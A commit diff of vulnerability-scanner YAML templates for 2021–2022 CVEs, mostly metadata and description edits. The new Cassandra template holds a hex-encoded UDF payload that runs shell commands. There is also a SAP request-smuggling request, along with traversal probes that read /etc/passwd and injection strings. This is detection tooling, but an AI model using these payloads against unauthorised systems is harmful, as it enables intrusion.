description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
remediation: Upgrade to Apache HTTP Server 2.4.51 or later.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
- https://twitter.com/itsecurityco/status/1446136957117943815
@ -44,3 +46,5 @@ requests:
name: RCE
words:
- "CVE-2021-42013"
# Enhanced by mp on 2022/02/27

14
cves/2021/CVE-2021-42258.yaml
View File

@ -1,17 +1,11 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
name: BillQuick Web Suite SQL Injection
author: dwisiswant0
severity: critical
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
description: BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1 allows SQL injection for unauthenticated remote code execution. Successful exploitation can include the ability to execute arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
@ -34,7 +28,7 @@ requests:
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
@ -67,3 +61,5 @@ requests:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"
# Enhanced by mp on 2022/02/27

8
cves/2021/CVE-2021-42551.yaml
View File

@ -1,13 +1,13 @@
id: CVE-2021-42551
info:
name: NetBiblio WebOPAC - Reflected XSS
name: NetBiblio WebOPAC - Reflected Cross-Site Scripting
author: compr00t
severity: medium
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected Cross-Site Scripting vulnerability in its Wikipedia modul through /NetBiblio/search/shortview via the searchTerm parameter.
description: NetBiblio WebOPAC before 4.0.0.320 is affected by a reflected cross-site scripting vulnerability in its Wikipedia module through /NetBiblio/search/shortview via the searchTerm parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42551
- https://www.redguard.ch/advisories/netbiblio_webopac.txt
- https://www.cve.org/CVERecord?id=CVE-2021-42551
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -45,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/27

8
cves/2021/CVE-2021-42565.yaml
View File

@ -2,11 +2,11 @@ id: CVE-2021-42565
info:
author: madrobot
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the UID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
- https://nvd.nist.gov/vuln/detail/CVE-2021-42565
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
@ -37,3 +37,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/27

7
cves/2021/CVE-2021-42566.yaml
View File

@ -1,11 +1,12 @@
id: CVE-2021-42566
info:
name: myfactory FMS - Reflected XSS
name: myfactory FMS - Reflected Cross-Site Scripting
author: madrobot
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
description: myfactory.FMS before 7.1-912 allows cross-site scripting via the Error parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-42566
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
classification:
@ -37,3 +38,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-42567.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-42567
info:
name: Apereo CAS Reflected XSS
name: Apereo CAS Reflected Cross-Site Scripting
author: pdteam
severity: medium
description: Apereo CAS through 6.4.1 allows XSS via POST requests sent to the REST API endpoints.
description: Apereo CAS through 6.4.1 allows cross-site scripting via POST requests sent to the REST API endpoints.
reference:
- https://apereo.github.io/2021/10/18/restvuln/
- https://www.sudokaikan.com/2021/12/exploit-cve-2021-42567-post-based-xss.html
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 401
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43062.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-43062
info:
name: Fortinet Fortimail 7.0.1 - Reflected XSS
name: Fortinet FortiMail 7.0.1 - Reflected Cross-Site Scripting
author: ajaysenr
severity: medium
description: An improper neutralization of input during web page generation vulnerability ('Cross-site Scripting') [CWE-79] in FortiMail may allow an unauthenticated attacker to perform an XSS attack via crafted HTTP GET requests to the FortiGuard URI protection service.
description: A cross-site scripting vulnerability in FortiMail may allow an unauthenticated attacker to perform an attack via specially crafted HTTP GET requests to the FortiGuard URI protection service.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-43062
- https://www.fortiguard.com/psirt/FG-IR-21-185
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43287.yaml
View File

@ -4,6 +4,8 @@ info:
name: Pre-Auth Takeover of Build Pipelines in GoCD
author: dhiyaneshDk
severity: critical
description: GoCD contains a critical information disclosure vulnerability whose exploitation allows unauthenticated attackers to leak configuration information including build secrets and encryption keys.
remediation: Upgrade to version v21.3.0. or later.
reference:
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
@ -11,6 +13,8 @@ info:
tags: cve,cve2021,go,lfi,gocd,takeover
metadata:
shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version"
classification:
cve-id: CVE-2021-43287
requests:
- method: GET
@ -26,3 +30,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43495.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-43495
info:
name: AlquistManager lfi
name: AlquistManager Local File Inclusion
author: pikpikcu
severity: high
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py
description: AlquistManager branch as of commit 280d99f43b11378212652e75f6f3159cde9c1d36 is affected by a directory traversal vulnerability in alquist/IO/input.py. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
reference:
- https://github.com/AlquistManager/alquist/issues/43
- https://nvd.nist.gov/vuln/detail/CVE-2021-43495
@ -25,3 +25,5 @@ requests:
regex:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/02/28

4
cves/2021/CVE-2021-43496.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-43496
info:
name: Clustering LFI
name: Clustering Local File Inclusion
author: Evan Rubinstein
severity: high
description: Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.
@ -25,3 +25,5 @@ requests:
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-43778.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 path traversal vulnerability.
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
author: cckuailong
severity: critical
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability. This issue was patched in version 2.6.1. As a workaround, delete the `front/send.php` file..
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.
remediation: Upgrade to version 2.6.1 or later. Or, as a workaround, delete the `front/send.php` file.
reference:
- https://github.com/AK-blank/CVE-2021-43778
- https://nvd.nist.gov/vuln/detail/CVE-2021-43778
@ -28,3 +29,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-43798.yaml
View File

@ -4,8 +4,8 @@ info:
name: Grafana v8.x Arbitrary File Read
author: z0ne,dhiyaneshDk
severity: high
description: Grafana is an open-source analytics and monitoring application. Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `<grafana_host_url>/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.
remediation: Upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1.
reference:
- https://github.com/grafana/grafana/security/advisories/GHSA-8pjx-jj86-j47p
- https://nosec.org/home/detail/4914.html
@ -34,4 +34,4 @@ requests:
status:
- 200
# Enhanced by cs on 2022/02/18
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-43810.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-43810
info:
name: Admidio - Reflected XSS
name: Admidio - Reflected Cross-Site Scripting
author: gy741
severity: medium
description: Admidio is a free open source user management system for websites of organizations and groups. A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The Reflected XSS vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts. This issue is patched in version 4.0.12.
description: A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.
remediation: Upgrade to version 4.0.12 or later.
reference:
- https://github.com/Admidio/admidio/security/advisories/GHSA-3qgf-qgc3-42hh
- https://nvd.nist.gov/vuln/detail/CVE-2021-43810
@ -36,3 +37,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-44228.yaml
View File

@ -1,11 +1,14 @@
id: CVE-2021-44228
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: melbadry9,dhiyaneshDK,daffainfo,anon-artist,0xceba,Tea
severity: critical
description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
remediation: Upgrade to Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later).
reference:
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
- https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
- https://www.lunasec.io/docs/blog/log4j-zero-day/
- https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
@ -68,3 +71,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28

4
cves/2021/CVE-2021-44427.yaml
View File

@ -4,7 +4,7 @@ info:
name: Rosario Student Information System Unauthenticated SQL Injection
author: furkansayim,xShuden
severity: critical
description: An unauthenticated SQL Injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
remediation: Upgrade to version 8.1.1 or higher.
reference:
- https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
@ -42,3 +42,5 @@ requests:
part: header
words:
- "RosarioSIS="
# Enhanced by mp on 2022/02/28

56
cves/2021/CVE-2021-44521.yaml Normal file
View File

@ -0,0 +1,56 @@
id: CVE-2021-44521
info:
name: Apache Cassandra Load UDF RCE
author: Y4er
description: "When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE."
severity: critical
reference:
- https://y4er.com/post/cve-2021-44521-apache-cassandra-udf-rce/
- https://nvd.nist.gov/vuln/detail/CVE-2021-44521
tags: cve,cve2021,network,rce,apache,cassandra
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.10
cve-id: CVE-2021-44521
cwe-id: CWE-94
network:
- inputs:
- data: "050000000500000000"
read: 1024
type: hex
- data: "0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
read: 1024
type: hex
- data: "7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b"
read: 1024
type: hex
- data: "7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510"
read: 1024
type: hex
- data: "1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85"
read: 1024
type: hex
- data: "51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e"
read: 1024
type: hex
- data: "450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281"
read: 1024
type: hex
- data: "3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a"
type: hex
read: 1024
host:
- "{{Hostname}}"
- "{{Host}}:9042"
matchers:
- type: word
part: raw
words:
- "123123"

2
cves/2021/CVE-2021-44528.yaml
View File

@ -35,3 +35,5 @@ requests:
- 302
- 307
- 308
# Enhanced by mp on 2022/02/28

2
cves/2021/CVE-2021-44848.yaml
View File

@ -34,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-45043.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-45043
info:
name: HD-Network Real-time Monitoring System 2.0 - Local File Inclusion
name: HD-Network Realtime Monitoring System 2.0 - Local File Inclusion
author: Momen Eldawakhly,Evan Rubinstein
severity: high
description: Instances of HD-Netowrk Real-time Monitoring System version 2.0 are vulnerable to a Local File Inclusion (LFI) vulnerability which allows remote unauthenticate attackers to view important, confidnetial information.
description: Instances of HD-Network Realtime Monitoring System version 2.0 are vulnerable to a Local File Inclusion vulnerability which allows remote unauthenticated attackers to view confidential information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-45043
- https://www.exploit-db.com/exploits/50588
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-45046.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-45046
info:
name: Remote code injection in Log4j
name: Apache Log4j2 Remote Code Injection
author: ImNightmaree
severity: critical
description: Apache Log4j2 Thread Context Lookup Pattern vulnerable to remote code execution in certain non-default configurations.
description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/
- https://twitter.com/marcioalm/status/1471740771581652995
@ -64,3 +64,5 @@ requests:
group: 1
regex:
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
# Enhanced by mp on 2022/02/28

8
cves/2021/CVE-2021-45092.yaml
View File

@ -4,7 +4,7 @@ info:
name: Thinfinity Iframe Injection
author: danielmofer
severity: critical
description: Thinfinity VirtualUI is a web remote desktop system, a vulnerability exist in a function located in /lab.html reachable by default that could allow IFRAME injection via the "vpath" parameter.
description: A vulnerability exists in Thinfinity VirtualUI in a function located in /lab.html reachable which by default could allow IFRAME injection via the "vpath" parameter.
reference:
- https://github.com/cybelesoft/virtualui/issues/2
- https://nvd.nist.gov/vuln/detail/CVE-2021-44848
@ -26,4 +26,8 @@ requests:
regex:
- ".*vpath.*"
- "thinfinity"
condition: and
condition: and
# Enhanced by mp on 2022/02/28
# Enhanced by mp on 2022/02/28

7
cves/2021/CVE-2021-45232.yaml
View File

@ -1,10 +1,11 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard api unauth access
name: Apache APISIX Dashboard API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication.
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
remediation: Upgrade to release 2.10.1 or later. Or, change the default username and password, and restrict the source IP to access the Apache APISIX Dashboard.
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-45380.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
name: AppCMS - Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
description: AppCMS 2.0.101 has a cross-site scripting vulnerability in \templates\m\inc_head.php.
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
@ -36,3 +36,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2021/CVE-2021-46005.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
name: Sourcecodester Car Rental Management System 1.0 - Stored Cross-Site Scripting
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to cross-site scripting via the vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
@ -109,3 +109,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

10
cves/2022/CVE-2022-0149.yaml
View File

@ -1,11 +1,13 @@
id: CVE-2022-0149
info:
name: WooCommerce Store Exporter < 2.7.1 - Reflected Cross-Site Scripting (XSS)
name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: The plugin was affected by a Reflected Cross-Site Scripting (XSS) vulnerability in the woo_ce admin page.
reference: https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page.
reference:
- https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c
- https://nvd.nist.gov/vuln/detail/CVE-2022-0149
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@ -43,3 +45,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

6
cves/2022/CVE-2022-0218.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2022-0218
info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting
author: hexcat
severity: medium
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
description: WordPress Email Template Designer WP HTML Mail allows stored cross-site scripting through an unprotected REST-API endpoint.
reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/
@ -38,3 +38,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

4
cves/2022/CVE-2022-0281.yaml
View File

@ -4,7 +4,7 @@ info:
name: Microweber Information Disclosure
author: pikpikcu
severity: high
description: Exposure of Sensitive Information to an Unauthorized Actor in Packagist microweber/microweber prior to 1.2.11.
description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0281
tags: cve,cve2022,microweber,disclosure
@ -34,3 +34,5 @@ requests:
- '"email":'
- '"display_name":'
condition: and
# Enhanced by mp on 2022/02/28

6
cves/2022/CVE-2022-0378.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2022-0378
info:
name: Microweber XSS
name: Microweber Reflected Cross-Site Scripting
author: pikpikcu
severity: medium
description: Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11.
description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0378
tags: cve,cve2022,microweber,xss
@ -33,3 +33,5 @@ requests:
- 'mwui_init'
- 'onmousemove="alert(document.domain)'
condition: and
# Enhanced by mp on 2022/02/28

6
cves/2022/CVE-2022-0432.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2022-0432
info:
name: CVE-2022-0432
name: Mastodon Prototype Pollution Vulnerability
author: pikpikcu
severity: medium
description: Prototype Pollution in GitHub repository mastodon/mastodon prior to 3.5.0.
description: The GitHub repository mastodon/mastodon prior to 3.5.0 contains a Prototype Pollution vulnerability.
reference:
- https://github.com/mastodon/mastodon/commit/4d6d4b43c6186a13e67b92eaf70fe1b70ea24a09
- https://drive.google.com/file/d/1vpZ0CcmFhTEUasLTPUBf8o-4l7G6ojtG/view
@ -31,3 +31,5 @@ requests:
part: body
words:
- "if (data.type !== 'setHeight' || !iframes[data.id]) {"
# Enhanced by mp on 2022/02/28

10
cves/2022/CVE-2022-0653.yaml
View File

@ -1,13 +1,17 @@
id: CVE-2022-0653
info:
name: Wordpress Profile Builder Plugin XSS
name: Wordpress Profile Builder Plugin Cross-Site Scripting
author: dhiyaneshDk
severity: medium
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-0653
- https://www.wordfence.com/blog/2022/02/reflected-cross-site-scripting-vulnerability-patched-in-wordpress-profile-builder-plugin/
tags: cve,cve2022,wordpress,xss,wp-plugin
description: "The Profile Builder &#8211; User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n"
description: "The Profile Builder User Profile & User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1.\n\n."
remediation: Upgrade to version 3.6.5 or later.
classification:
cve-id: CVE-2022-0653
requests:
- method: GET
@ -29,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/02/28

59
cves/2022/CVE-2022-22536.yaml Normal file
View File

@ -0,0 +1,59 @@
id: CVE-2022-22536
info:
name: SAP Memory Pipes(MPI) Desynchronization
author: pdteam
severity: critical
description: SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-22536
- https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day+-+February+2022
- https://github.com/Onapsis/onapsis_icmad_scanner
- https://blogs.sap.com/2022/02/11/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation-in-sap-netweaver-sap-content-server-and-sap-web-dispatcher/
tags: cve,cve2022,sap,smuggling
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2022-22536
cwe-id: CWE-444
requests:
- raw:
- |+
GET {{sap_path}} HTTP/1.1
Host: {{Hostname}}
Content-Length: 82646
Connection: keep-alive
{{repeat("A", 82642)}}
GET / HTTP/1.1
Host: {{Hostname}}
payloads:
sap_path: # based on https://github.com/Onapsis/onapsis_icmad_scanner
- /sap/admin/public/default.html
- /sap/public/bc/ur/Login/assets/corbu/sap_logo.png
unsafe: true
read-all: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: dsl
dsl:
- "contains(tolower(body), 'administration')" # confirms 1st path
